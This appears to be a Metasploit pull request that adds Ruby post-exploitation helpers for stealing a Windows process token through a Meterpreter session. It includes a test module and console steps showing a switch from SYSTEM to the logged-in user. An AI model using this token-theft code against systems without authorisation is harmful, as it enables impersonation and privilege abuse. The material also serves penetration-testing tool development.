### PR TITLE
Add new POST exploitation APIs for stealing a token

### DIFF
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -52,7 +52,7 @@ module Msf::Post::Windows::Priv
   #
   # Steals a token for a user.
   # @param String computer_name Computer name.
-  # @param String username To token to steal from. If not set, it will try to steal
+  # @param String user_name To token to steal from. If not set, it will try to steal
   #                        the current user's token.
   # @return [boolean] TrueClass if successful, otherwise FalseClass.
   # @example steal_token(get_env('COMPUTERNAME'), get_env('USERNAME'))

--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -43,6 +43,47 @@ module Msf::Post::Windows::Priv
     end
   end
 
+  # Steals the current user's token.
+  def steal_current_user_token
+    steal_token(get_env('COMPUTERNAME'), get_env('USERNAME'))
+  end
+
+  #
+  # Steals a token for a user.
+  # @param String computer_name Computer name.
+  # @param String username To token to steal from. If not set, it will try to steal
+  #                        the current user's token.
+  # @return [boolean] TrueClass if successful, otherwise FalseClass.
+  # @example steal_token(get_env('COMPUTERNAME'), get_env('USERNAME'))
+  #
+  def steal_token(computer_name, user_name)
+    pid = nil
+
+    session.sys.process.processes.each do |p|
+      if p['user'] == "#{computer_name}\\#{user_name}"
+        pid = p['pid']
+      end
+    end
+
+    unless pid
+      vprint_error("No PID found for #{user_name}")
+      return false
+    end
+
+    vprint_status("Stealing token from PID #{pid} for #{user_name}")
+
+    begin
+      session.sys.config.steal_token(pid)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      # It could raise an exception even when the token is successfully stolen,
+      # so we will just log the exception and move on.
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    end
+
+    true
+  end
+
+
   #
   # Returns true if in the administrator group
   #

--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -44,6 +44,7 @@ module Msf::Post::Windows::Priv
   end
 
   # Steals the current user's token.
+  # @see steal_token
   def steal_current_user_token
     steal_token(get_env('COMPUTERNAME'), get_env('USERNAME'))
   end


### PR DESCRIPTION
# What This PR Does

This adds two new methods to steal a token from a process.
- **steal_token** - This method steals a token from a process based on a specific computer name and username.
- **steal_current_user_token** -- This method steals a token from the current user.
# Verification
- [x] Save the following script:

``` ruby
require 'msf/core'

class MetasploitModule < Msf::Post

  include Msf::Post::Windows::Priv

  def initialize(info={})
    super(update_info(info,
        'Name'          => 'post test',
        'Description'   => %q{
          post
        },
        'License'       => MSF_LICENSE,
        'Author'        => [ 'sinn3r' ],
        'Platform'      => [ 'win' ],
        'SessionTypes'  => [ 'meterpreter' ]
    ))
  end

  def run
    steal_token(get_env('COMPUTERNAME'), get_env('USERNAME'))
  end

end
```
- [x] Start a Windows XP box
- [x] Obtain a Meterpreter session from the XP box
- [x] In the session/Meterpreter prompt, do: `getsystem`
- [x] Do: `getuid` to check that you're on SYSTEM level access
- [x] Do: `run [path to the test script]`
- [x] Do: `getuid` again, this time you're no longer SYSTEM, but you're the current user.

Example for the above steps:

```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/manage/priv_test
meterpreter > getuid
Server username: SINN3R-4345996F\sinn3r
meterpreter > 
```
